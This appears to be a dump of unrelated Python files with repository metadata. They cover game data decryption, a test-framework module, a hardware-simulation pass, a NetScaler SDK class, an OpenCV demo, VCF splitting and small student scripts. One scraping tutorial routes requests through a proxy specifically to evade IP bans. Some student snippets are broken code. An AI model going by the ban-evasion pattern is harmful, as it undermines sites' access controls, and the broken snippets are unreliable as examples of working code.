    ACCOUNT_BOOSTS = 27  # XP boost, mana boost, etc
    ARENA_WIN_STREAK_BONUSES = 28
    CHAT_BANNED_WORDS = 29
    IFRIT_SUMMON_ITEM = 30
    SECRET_DUNGEONS = 31
    SECRET_DUNGEON_ENEMIES = 32
    PURCHASEABLE_ITEMS = 33
    DAILY_MISSIONS = 34
    VARIOUS_CONSTANTS = 35
    MONSTER_POWER_UP_COSTS = 36
    RUNE_UNEQUIP_COSTS = 37
    RUNE_UPGRADE_COSTS_AND_CHANCES = 38
    SCENARIO_REGIONS = 39
    PURCHASEABLE_ITEMS2 = 40
    # Unknown table 41 - scroll/cost related?
    MAIL_ITEMS = 42
    # Unknown table 43 - angelmon reward sequences?
    MONSTER_FUSION_RECIPES_OLD = 44
    TOA_REWARDS = 45
    MONSTER_FUSION_RECIPES = 46
    TOA_FLOOR_MODELS_AND_EFFECTS = 47
    ELLIA_COSTUMES = 48
    GUILD_LEVELS = 49  # Unimplemented in-game
    GUILD_BONUSES = 50  # Unimplemented in-game
    RUNE_STAT_VALUES = 51
    GUILD_RANKS = 52
    GUILD_UNASPECTED_SUMMON_PIECES = 53  # Ifrit and Cowgirl pieces
    # Unknown table 54 - possible rune crafting or package
    MONSTER_TRANSMOGS = 55
    ELEMENTAL_RIFT_DUNGEONS = 56
    WORLD_BOSS_SCRIPT = 57
    WORLD_BOSS_ELEMENTAL_ADVANTAGES = 58
    WORLD_BOSS_FIGHT_RANKS = 59
    WORLD_BOSS_PLAYER_RANKS = 60
    SKILL_TRANSMOGS = 61
    ENCHANT_GEMS = 62
    GRINDSTONES = 63
    RUNE_CRAFT_APPLY_COSTS = 64
    RIFT_RAIDS = 65
    # Unknown table 66 - some sort of reward related
    ELLIA_COSTUME_ITEMS = 67
    CHAT_BANNED_WORDS2 = 68
    CHAT_BANNED_WORDS3 = 69
    CHAT_BANNED_WORDS4 = 70
    CRAFT_MATERIALS = 71
    HOMUNCULUS_SKILL_TREES = 72
    HOMUNCULUS_CRAFT_COSTS = 73
    ELEMENTAL_DAMAGE_RANKS = 74
    WORLD_ARENA_RANKS = 75
    WORLD_ARENA_SHOP_ITEMS = 76
    CHAT_BANNED_WORDS5 = 77
    CHAT_BANNED_WORDS6 = 78
    CHAT_BANNED_WORDS7 = 79
    CHAT_BANNED_WORDS8 = 80
    ARENA_CHOICE_UI = 81
    IFRIT_TRANSMOGS = 82
    # Unknown table 83 - value lists related to game version
    CHALLENGES = 84
    # Unknown table 85 - some sort of rules
    WORLD_ARENA_SEASON_REWARDS = 86
    WORLD_ARENA_RANKS2 = 87
    WORLD_ARENA_REWARD_LIST = 88
    GUILD_SIEGE_MAP = 89
    GUILD_SIEGE_REWARD_BOXES = 90
    GUILD_SIEGE_RANKINGS = 91
def save_localvalue_tables():
    """Dump every localvalue table to its own CSV file for inspection.

    NOTE(review): the upper bound of 99 exceeds the highest table defined
    in LocalvalueTables (91); _get_localvalue_tables raises KeyError if the
    data file contains fewer tables than requested - confirm the range.
    """
    for x in range(1, 99):
        table = _get_localvalue_tables(x)
        # newline='' is required by the csv module; without it every row is
        # followed by a blank line on Windows (\r\r\n line endings)
        with open(f'bestiary/com2us_data/localvalue_{x}.csv', 'w', encoding='utf-8', newline='') as f:
            writer = csv.DictWriter(f, fieldnames=table['header'])
            writer.writeheader()
            for row in table['rows']:
                writer.writerow(row)
def _decrypt_localvalue_dat():
    """Read localvalue.dat, strip NUL padding, and return the decrypted payload."""
    with open('bestiary/com2us_data/localvalue.dat') as f:
        raw_contents = f.read()
    return decrypt_response(raw_contents.strip('\0'))
def _get_localvalue_tables(table_id):
    """Extract one tab-separated table from the decrypted localvalue.dat.

    Layout: 0x24 bytes of header, a little-endian int32 table count, 0xc
    bytes of padding, then (table_num, start, end) int32 triples for each
    table. Table contents are tab-separated text (header row first) whose
    offsets are relative to the end of the offset directory.

    Returns a dict with 'header' (list of column names) and 'rows' (list
    of {column: value} dicts; values are the raw strings from the file).
    """
    tables = {}
    decrypted_localvalue = _decrypt_localvalue_dat()
    raw = ConstBitStream(decrypted_localvalue)
    raw.read('pad:{}'.format(0x24 * 8))
    num_tables = raw.read('intle:32') - 1
    raw.read('pad:{}'.format(0xc * 8))
    if num_tables > int(max(LocalvalueTables)):
        print('WARNING! Found {} tables in localvalue.dat. There are only {} tables defined!'.format(num_tables, int(max(LocalvalueTables))))
    # Read the locations of all defined tables
    for x in range(0, num_tables):
        table_num, start, end = raw.readlist(['intle:32']*3)
        tables[table_num] = {
            'start': start,
            'end': end
        }
    # Record where we are now, as that is the offset of where the first table starts
    table_start_offset = int(raw.pos / 8)
    # Load the requested table and return it
    raw = ConstBitStream(decrypted_localvalue)
    table_data = {
        'header': [],
        'rows': []
    }
    raw.read('pad:{}'.format((table_start_offset + tables[table_id]['start']) * 8))
    table_str = raw.read('bytes:{}'.format(tables[table_id]['end'] - tables[table_id]['start'])).decode('utf-8').strip()
    table_rows = table_str.split('\r\n')
    table_data['header'] = table_rows[0].split('\t')
    table_data['rows'] = [{table_data['header'][col]: value for col, value in enumerate(row.split('\t'))} for row in table_rows[1:]]
    return table_data
| [
"peter@porksmash.com"
] | peter@porksmash.com |
f800f8822a575845596e69e4820327b694eb29c9 | 98dffa1d08cd2f7242650bb9eeacae42f6368300 | /scripting/layering.py | 4b4a6c016cf873d9c2462f7e3f1f67ad3ae0cb1f | [] | no_license | ucll-scripting/testing-framework | 01c93c666070776e75f63f647f125ecdeb49dc91 | 68452b00d25484d48af3087486b295d9f595a000 | refs/heads/master | 2023-02-26T01:22:06.326330 | 2021-02-02T14:47:47 | 2021-02-02T14:47:47 | 335,320,727 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,584 | py | from contextlib import contextmanager
from scripting.dynamic import create_dynamic_variable, dynamic_bind
from scripting.testing import observers, skip_if
@contextmanager
def _layered_observers(counter, on_pass=None, on_fail=None, on_skip=None):
observer_layer = counter.value
def wrap(f):
def observer(*args):
if counter.value == observer_layer:
f(*args)
return observer
on_pass = wrap(on_pass) if on_pass else None
on_fail = wrap(on_fail) if on_fail else None
on_skip = wrap(on_skip) if on_skip else None
with observers(on_pass=on_pass, on_fail=on_fail, on_skip=on_skip):
yield
@contextmanager
def _layered_skip_if(counter, skip_if):
observer_layer = counter.value
def wrap(f):
def wrapped(*args):
if counter.value == observer_layer:
return f(*args)
else:
return False
return wrapped
with skip_if(wrap(skip_if)):
yield
@contextmanager
def _add_layer(counter):
with dynamic_bind(counter, counter.value + 1):
yield
class _Layering:
def __init__(self):
self.__counter = create_dynamic_variable().bind(0)
def add(self):
return _add_layer(self.__counter)
def observers(self, on_pass=None, on_fail=None, on_skip=None):
return _layered_observers(self.__counter, on_pass=on_pass, on_fail=on_fail, on_skip=on_skip)
def skip_if(self, predicate):
return _layered_skip_if(self.__counter, predicate)
def create_layering():
return _Layering()
| [
"frederic.vogels@ucll.be"
] | frederic.vogels@ucll.be |
c081ccf7cbea4d0b4ab68487450cb1e471fe4399 | bf8870d923adca9877d4b4dacef67f0a454727a8 | /codeforces.com/contest/630/a/pr.py | 1c045061b50ebd8695eb0529af14d00a18b26d2c | [] | no_license | artkpv/code-dojo | 6f35a785ee5ef826e0c2188b752134fb197b3082 | 0c9d37841e7fc206a2481e4640e1a024977c04c4 | refs/heads/master | 2023-02-08T22:55:07.393522 | 2023-01-26T16:43:33 | 2023-01-26T16:43:33 | 158,388,327 | 1 | 0 | null | 2023-01-26T08:39:46 | 2018-11-20T12:45:44 | C# | UTF-8 | Python | false | false | 95 | py | print(25)
input()
help()
l = set()
def foo2(p0, p3, p1=1, p2="abc"):
pass
foo2(1, 2)
| [
"artyomkarpov@gmail.com"
] | artyomkarpov@gmail.com |
9096a6363c0b799ebf47452ce695152375b0105e | 28ddc330bbfcebf3ce7d75643d06919ebed77f5f | /pymtl3/passes/WrapGreenletPass.py | c9b5bb8eee1e267730648dec2db763dff65ae88e | [
"BSD-3-Clause"
] | permissive | hsqforfun/pymtl3 | 848d642abcf539688750f4b26e93133191a88bae | 05e06601cf262a663a95d1235cb99056ece84580 | refs/heads/master | 2020-09-01T15:15:27.891486 | 2019-10-31T23:42:59 | 2019-10-31T23:42:59 | 218,990,327 | 1 | 0 | BSD-3-Clause | 2019-11-01T13:27:04 | 2019-11-01T13:27:03 | null | UTF-8 | Python | false | false | 1,816 | py | """
========================================================================
WrapGreenletPass.py
========================================================================
Wrap all update blocks that call methods with blocking decorator with
greenlet.
Author : Shunning Jiang
Date : May 20, 2019
"""
from graphviz import Digraph
from greenlet import greenlet
from pymtl3.dsl.errors import UpblkCyclicError
from .BasePass import BasePass
from .errors import PassOrderError
class WrapGreenletPass( BasePass ):
def __call__( self, top ):
if not hasattr( top, "_dag" ):
raise PassOrderError( "_dag" )
self.wrap_greenlet( top )
def wrap_greenlet( self, top ):
all_upblks = top._dag.final_upblks
all_constraints = top._dag.all_constraints
greenlet_upblks = top._dag.greenlet_upblks
if not greenlet_upblks:
return
def wrap_greenlet( blk ):
def greenlet_wrapper():
while True:
blk()
greenlet.getcurrent().parent.switch()
gl = greenlet( greenlet_wrapper )
def greenlet_ticker():
gl.switch()
# greenlet_ticker.greenlet = gl
greenlet_ticker.__name__ = blk.__name__
return greenlet_ticker
new_upblks = set()
wrapped_blk_mapping = {}
for blk in all_upblks:
if blk in greenlet_upblks:
wrapped = wrap_greenlet( blk )
wrapped_blk_mapping[ blk ] = wrapped
new_upblks.add( wrapped )
else:
new_upblks.add( blk )
new_constraints = set()
for (x, y) in all_constraints:
if x in greenlet_upblks:
x = wrapped_blk_mapping[ x ]
if y in greenlet_upblks:
y = wrapped_blk_mapping[ y ]
new_constraints.add( (x, y) )
top._dag.final_upblks = new_upblks
top._dag.all_constraints = new_constraints
| [
"sj634@cornell.edu"
] | sj634@cornell.edu |
b633d59df92330c4c250a5e2819100d322277041 | aa1e637de90f69f9ae742d42d5b777421617d10c | /nitro/resource/config/network/iptunnel.py | 9befd5abeab9ba2d3985b199b3dcc42e2d22188e | [
"Apache-2.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | km0420j/nitro-python | db7fcb49fcad3e7a1ae0a99e4fc8675665da29ba | d03eb11f492a35a2a8b2a140322fbce22d25a8f7 | refs/heads/master | 2021-10-21T18:12:50.218465 | 2019-03-05T14:00:15 | 2019-03-05T15:35:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,031 | py | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nitro.resource.base.base_resource import base_resource
from nitro.resource.base.base_resource import base_response
from nitro.service.options import options
from nitro.exception.nitro_exception import nitro_exception
from nitro.util.nitro_util import nitro_util
class iptunnel(base_resource) :
"""Configuration for ip Tunnel resource."""
def __init__(self) :
self._name = ""
self._remote = ""
self._remotesubnetmask = ""
self._local = ""
self._protocol = ""
self._grepayload = ""
self._ipsecprofilename = ""
self._vlan = 0
self._ownergroup = ""
self._sysname = ""
self._type = 0
self._encapip = ""
self._channel = 0
self._tunneltype = []
self._ipsectunnelstatus = ""
self._pbrname = ""
self.___count = 0
@property
def name(self) :
"""Name for the IP tunnel. Leading character must be a number or letter. Other characters allowed, after the first character, are @ _ - . (period) : (colon) # and space ( ).<br/>Minimum length = 1."""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name for the IP tunnel. Leading character must be a number or letter. Other characters allowed, after the first character, are @ _ - . (period) : (colon) # and space ( ).<br/>Minimum length = 1
:param name:
"""
try :
self._name = name
except Exception as e:
raise e
@property
def remote(self) :
"""Public IPv4 address, of the remote device, used to set up the tunnel. For this parameter, you can alternatively specify a network address.<br/>Minimum length = 1."""
try :
return self._remote
except Exception as e:
raise e
@remote.setter
def remote(self, remote) :
"""Public IPv4 address, of the remote device, used to set up the tunnel. For this parameter, you can alternatively specify a network address.<br/>Minimum length = 1
:param remote:
"""
try :
self._remote = remote
except Exception as e:
raise e
@property
def remotesubnetmask(self) :
"""Subnet mask of the remote IP address of the tunnel."""
try :
return self._remotesubnetmask
except Exception as e:
raise e
@remotesubnetmask.setter
def remotesubnetmask(self, remotesubnetmask) :
"""Subnet mask of the remote IP address of the tunnel.
:param remotesubnetmask:
"""
try :
self._remotesubnetmask = remotesubnetmask
except Exception as e:
raise e
@property
def local(self) :
"""Type ofNetScaler owned public IPv4 address, configured on the local NetScaler appliance and used to set up the tunnel."""
try :
return self._local
except Exception as e:
raise e
@local.setter
def local(self, local) :
"""Type ofNetScaler owned public IPv4 address, configured on the local NetScaler appliance and used to set up the tunnel.
:param local:
"""
try :
self._local = local
except Exception as e:
raise e
@property
def protocol(self) :
"""Name of the protocol to be used on this tunnel.<br/>Default value: IPIP<br/>Possible values = IPIP, GRE, IPSEC, VXLAN."""
try :
return self._protocol
except Exception as e:
raise e
@protocol.setter
def protocol(self, protocol) :
"""Name of the protocol to be used on this tunnel.<br/>Default value: IPIP<br/>Possible values = IPIP, GRE, IPSEC, VXLAN
:param protocol:
"""
try :
self._protocol = protocol
except Exception as e:
raise e
@property
def grepayload(self) :
"""The payload GRE will carry.<br/>Default value: ETHERNETwithDOT1Q<br/>Possible values = ETHERNETwithDOT1Q, ETHERNET, IP."""
try :
return self._grepayload
except Exception as e:
raise e
@grepayload.setter
def grepayload(self, grepayload) :
"""The payload GRE will carry.<br/>Default value: ETHERNETwithDOT1Q<br/>Possible values = ETHERNETwithDOT1Q, ETHERNET, IP
:param grepayload:
"""
try :
self._grepayload = grepayload
except Exception as e:
raise e
@property
def ipsecprofilename(self) :
"""Name of IPSec profile to be associated.<br/>Default value: "ns_ipsec_default_profile"."""
try :
return self._ipsecprofilename
except Exception as e:
raise e
@ipsecprofilename.setter
def ipsecprofilename(self, ipsecprofilename) :
"""Name of IPSec profile to be associated.<br/>Default value: "ns_ipsec_default_profile"
:param ipsecprofilename:
"""
try :
self._ipsecprofilename = ipsecprofilename
except Exception as e:
raise e
@property
def vlan(self) :
"""The vlan for mulicast packets.<br/>Minimum length = 1<br/>Maximum length = 4094."""
try :
return self._vlan
except Exception as e:
raise e
@vlan.setter
def vlan(self, vlan) :
"""The vlan for mulicast packets.<br/>Minimum length = 1<br/>Maximum length = 4094
:param vlan:
"""
try :
self._vlan = vlan
except Exception as e:
raise e
@property
def ownergroup(self) :
"""The owner node group in a Cluster for the iptunnel.<br/>Default value: DEFAULT_NG<br/>Minimum length = 1."""
try :
return self._ownergroup
except Exception as e:
raise e
@ownergroup.setter
def ownergroup(self, ownergroup) :
"""The owner node group in a Cluster for the iptunnel.<br/>Default value: DEFAULT_NG<br/>Minimum length = 1
:param ownergroup:
"""
try :
self._ownergroup = ownergroup
except Exception as e:
raise e
@property
def sysname(self) :
"""The name of the ip tunnel."""
try :
return self._sysname
except Exception as e:
raise e
@property
def type(self) :
"""The type of this tunnel."""
try :
return self._type
except Exception as e:
raise e
@property
def encapip(self) :
"""The effective local IP address of the tunnel. Used as the source of the encapsulated packets."""
try :
return self._encapip
except Exception as e:
raise e
@property
def channel(self) :
"""The tunnel that is bound to a netbridge."""
try :
return self._channel
except Exception as e:
raise e
@property
def tunneltype(self) :
"""Indicates that a tunnel is User-Configured, Internal or DELETE-IN-PROGRESS.<br/>Possible values = Configured, Delete-In-Progress."""
try :
return self._tunneltype
except Exception as e:
raise e
@property
def ipsectunnelstatus(self) :
"""Whether the ipsec on this tunnel is up or down.<br/>Possible values = DOWN, UP, PARTIAL-UP, UNKNOWN."""
try :
return self._ipsectunnelstatus
except Exception as e:
raise e
@property
def pbrname(self) :
"""Name for the PBR."""
try :
return self._pbrname
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
"""converts nitro response into object and returns the object array in case of get request.
:param service:
:param response:
"""
try :
result = service.payload_formatter.string_to_resource(iptunnel_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.iptunnel
except Exception as e :
raise e
def _get_object_name(self) :
"""Returns the value of object identifier argument"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
"""Use this API to add iptunnel.
:param client:
:param resource:
"""
try :
if type(resource) is not list :
addresource = iptunnel()
addresource.name = resource.name
addresource.remote = resource.remote
addresource.remotesubnetmask = resource.remotesubnetmask
addresource.local = resource.local
addresource.protocol = resource.protocol
addresource.grepayload = resource.grepayload
addresource.ipsecprofilename = resource.ipsecprofilename
addresource.vlan = resource.vlan
addresource.ownergroup = resource.ownergroup
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ iptunnel() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].name = resource[i].name
addresources[i].remote = resource[i].remote
addresources[i].remotesubnetmask = resource[i].remotesubnetmask
addresources[i].local = resource[i].local
addresources[i].protocol = resource[i].protocol
addresources[i].grepayload = resource[i].grepayload
addresources[i].ipsecprofilename = resource[i].ipsecprofilename
addresources[i].vlan = resource[i].vlan
addresources[i].ownergroup = resource[i].ownergroup
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
"""Use this API to delete iptunnel.
:param client:
:param resource:
"""
try :
if type(resource) is not list :
deleteresource = iptunnel()
if type(resource) != type(deleteresource):
deleteresource.name = resource
else :
deleteresource.name = resource.name
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ iptunnel() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ iptunnel() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
"""Use this API to fetch all the iptunnel resources that are configured on netscaler.
:param client:
:param name: (Default value = "")
:param option_: (Default value = "")
"""
try :
if not name :
obj = iptunnel()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = iptunnel()
obj.name = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [iptunnel() for _ in range(len(name))]
obj = [iptunnel() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = iptunnel()
obj[i].name = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_args(cls, client, args) :
"""Use this API to fetch all the iptunnel resources that are configured on netscaler.
# This uses iptunnel_args which is a way to provide additional arguments while fetching the resources.
:param client:
:param args:
"""
try :
obj = iptunnel()
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(args)
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
"""Use this API to fetch filtered set of iptunnel resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
:param client:
:param filter_:
"""
try :
obj = iptunnel()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
"""Use this API to count the iptunnel resources configured on NetScaler.
:param client:
"""
try :
obj = iptunnel()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
"""Use this API to count filtered the set of iptunnel resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
:param client:
:param filter_:
"""
try :
obj = iptunnel()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Protocol:
""" """
IPIP = "IPIP"
GRE = "GRE"
IPSEC = "IPSEC"
VXLAN = "VXLAN"
class Tunneltype:
""" """
Configured = "Configured"
Delete_In_Progress = "Delete-In-Progress"
class Ipsectunnelstatus:
""" """
DOWN = "DOWN"
UP = "UP"
PARTIAL_UP = "PARTIAL-UP"
UNKNOWN = "UNKNOWN"
class Grepayload:
""" """
ETHERNETwithDOT1Q = "ETHERNETwithDOT1Q"
ETHERNET = "ETHERNET"
IP = "IP"
class iptunnel_response(base_response) :
""" """
def __init__(self, length=1) :
self.iptunnel = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.iptunnel = [iptunnel() for _ in range(length)]
| [
"lennart.weller@hansemerkur.de"
] | lennart.weller@hansemerkur.de |
a8400b17416c685d35835321143d2a02eb4e838b | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/222/40577/submittedfiles/testes.py | 1db880d83fe690190078250959ae8a1407242aa4 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | # -*- coding: utf-8 -*-
n=int('n:')
i=1
cont=0
while i<n:
if i%2==1:
cont=cont+1
i=i+1
print(cont) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
3959ec371c5fcdf95fc0d3374d91d8402a7200ed | 3e50ed55208122b2f8b34e7f26f33c9ef70efce5 | /python/distributed_spider/distributed_spider/spiders/add_task.py | c98dc6dadbbf75c65779f451818ce7992048148c | [] | no_license | brady-wang/mac_home | b8343da428a4e6696b89d0e6a53ff0dfc87ffd21 | c56a739c31d3c0f62d26d8512fe1a90c036a1f96 | refs/heads/master | 2023-01-14T11:42:02.544322 | 2019-10-02T11:47:27 | 2019-10-02T11:47:27 | 193,177,718 | 0 | 0 | null | 2023-01-04T13:55:31 | 2019-06-22T01:27:10 | PHP | UTF-8 | Python | false | false | 321 | py | # -*- coding: utf-8 -*-
import scrapy
import redis
url = "https://www.pexels.com/photo/aerial-photo-of-high-rise-building-754587/"
url1 = "https://www.pexels.com/photo/waterfalls-688559/"
rds = redis.StrictRedis(host='192.168.33.10',port='6379')
# res = rds.rpush('yeves:urls',url)
# res = rds.rpush('yeves:urls',url1)
| [
"brady.wang@qq.com"
] | brady.wang@qq.com |
3db0a0d16fc6a8444278c81119ea8a2c2070ac2c | 466660115eafd99b72f81339d86c5bcbf4c7efb0 | /codes/12/opencv_warpPerspective_demo.py | 8cec5184ed3d80d675d2deace8ff2ccd3a81d8d2 | [] | no_license | CoryVegan/scipybook2 | c2bb68c169c632ab389600034beb33ac921b0ba1 | a8fd295c2f2d7ee18f351e5622ca7eeb4649ee50 | refs/heads/master | 2020-03-23T14:50:28.056482 | 2017-08-25T06:00:00 | 2018-06-02T14:18:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | # -*- coding: utf-8 -*-
"""
透视变换
"""
import pyopencv as cv
import numpy as np
from enthought.traits.api import HasTraits, Array
from enthought.traits.ui.api import View, Item
class PerspectiveDemo(HasTraits):
src = Array(shape=(4,2), dtype=np.float32)
dst = Array(shape=(4,2), dtype=np.float32)
View = View(
Item("dst", label="变换后坐标"),
title = "Perspective Demo控制面板"
)
def __init__(self, **traits):
super(PerspectiveDemo, self).__init__(**traits)
self.img = cv.imread("lena.jpg")
w = self.img.size().width
h = self.img.size().height
self.src = np.array([[0,0],[w,0],[0,h],[w,h]],dtype=np.float32)
self.dst = np.array([[0,0],[w,0],[0,h],[w,h]],dtype=np.float32)
self.on_trait_change(self.redraw, "src,dst")
self.redraw()
def redraw(self):
src = cv.asvector_Point2f(self.src)
dst = cv.asvector_Point2f(self.dst)
m = cv.getPerspectiveTransform(src, dst)
print(m)
img2 = cv.Mat()
cv.warpPerspective(self.img, img2, m, self.img.size())
cv.imshow("Perspective Demo", img2)
cv.namedWindow("Perspective Demo")
demo = PerspectiveDemo()
demo.configure_traits() | [
"qytang326@gmail.com"
] | qytang326@gmail.com |
9e80f8345769e92d4e8fb3b81070349c27728a06 | 6fadc260ab5c0109adf026cb8dae8eefcf0ba271 | /第五章:requests模块高级/3.代理操作.py | 0c1773ae5889a4b22a652ac9caca78f2e2f06950 | [] | no_license | Echo-yay/Crawler_base | 03d439f5fb76d98ef881dada4fec90e24689c424 | 808b40198c887739f2721bec47c61f255d76706a | refs/heads/master | 2023-04-02T17:57:16.318607 | 2021-04-13T02:34:04 | 2021-04-13T02:34:04 | 346,982,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | # 中国矿业大学(北京)/ 机电硕-6 / ZQT2000405103 / 李天鸽
# 编辑时间:2021/3/30 11:40
#需求:
import requests
url = 'https://www.baidu.com/s?wd=IP'
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
}
page_text = requests.get(url=url,headers=headers,proxies={'https':'121.20.48.98:37859'}).text
with open('ip.html','w',encoding='utf-8') as fp:
fp.write(page_text)
#反爬机制:封IP
#反反爬机制:使用代理进行请求发送
| [
"1740636835@qq.com"
] | 1740636835@qq.com |
3051b5bf40691b588759dbb19716f1297f6e2f24 | 7cd6a7bc72f0026056a7238c0feea081bfff13a7 | /bioprocs/scripts/vcf/pVcfSplit.py | e3c812d9b357910cb9cc4fd6481bd4e244304649 | [
"MIT"
] | permissive | shijianasdf/biopipen | 8d963ccca38e2a9d7a46582a5eec45c38924655c | d53b78aa192fd56a5da457463b099b2aa833b284 | refs/heads/master | 2023-08-18T18:28:03.306877 | 2019-12-31T16:17:35 | 2019-12-31T16:17:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,318 | py | from os import path
from sys import stderr
from diot import Diot
from bioprocs.utils import parallel, shell2 as shell
from bioprocs.utils.reference import vcfIndex
infile = {{i.infile | quote}}
prefix = {{i.infile | fn2 | quote}}
outdir = {{o.outdir | quote}}
samples = {{i.samples | quote}}
tool = {{args.tool | quote}}
bcftools = {{args.bcftools | quote}}
gatk = {{args.gatk | quote}}
tabix = {{args.tabix | quote}}
ref = {{args.ref | quote}}
params = {{args.params | repr}}
nthread = {{args.nthread | repr}}
shell.load_config(bcftools = bcftools, gatk = gatk)
vcfIndex(infile, tabix = tabix)
allsamples = shell.bcftools.query(l = infile).splitlines()
allsamples = [s.strip() for s in allsamples if s.strip()]
if samples:
with open(samples) as f:
samples = f.readlines()
samples = list(set(allsamples) & set(samples))
else:
samples = allsamples
def run_bcftools_one(sample):
shell.fg.bcftools.view(_ = infile, s = sample, o = path.join(outdir, '{}-{}.vcf'.format(prefix, sample)), **params)
def run_bcftools():
parallel.Parallel(nthread).run(run_bcftools_one, [(sample,) for sample in samples])
def run_awk_one(sample, index, awkfile):
shell.awk(
v = ["sample={!r}".format(sample), "index={}".format(index + 10)],
_stderr = stderr,
f = awkfile,
_ = infile,
_out = path.join(outdir, '{}-{}.vcf'.format(prefix, sample)))
def run_awk():
# write the awk script
awkfile = path.join(outdir, 'vcfsample.awk')
awkfh = open(awkfile, 'w')
awkfh.write("""
BEGIN {
OFS="\\t"
}
$0 ~ "^##" {
print
}
$0 ~ "^#CHROM" {
print "#CHROM\\tPOS\\tID\\tREF\\tALT\\tQUAL\\tFILTER\\tINFO\\tFORMAT\\t"sample
}
$0 !~ "^#" {
print $1,$2,$3,$4,$5,$6,$7,$8,$9,$index
}
""")
awkfh.close()
parallel.Parallel(nthread).run(run_awk_one, [(sample, i, awkfile) for i, sample in enumerate(samples)])
def run_gatk_one(sample):
shell.fg.gatk(
R = ref,
V = infile,
o = path.join(outdir, '{}-{}.vcf'.format(prefix, sample)),
sample_name = sample,
T = 'SelectVariants',
excludeNonVariants = True,
**params
)
def run_gatk():
parallel.Parallel(nthread).run(run_gatk_one, [(sample, ) for sample in samples])
tools = dict(bcftools = run_bcftools, awk = run_awk, gatk = run_gatk)
try:
tools[tool]()
except KeyError:
raise ValueError('Tool {!r} not supported yet.'.format(tool))
| [
"pwwang@pwwang.com"
] | pwwang@pwwang.com |
670f9701fbec9a75954af763abaa0d149061f45e | d7016f69993570a1c55974582cda899ff70907ec | /sdk/eventhub/azure-mgmt-eventhub/azure/mgmt/eventhub/v2021_11_01/aio/operations/_private_endpoint_connections_operations.py | fa908157bc8dcc1fd2a5e6390e0cd97f16d1ce46 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 24,069 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
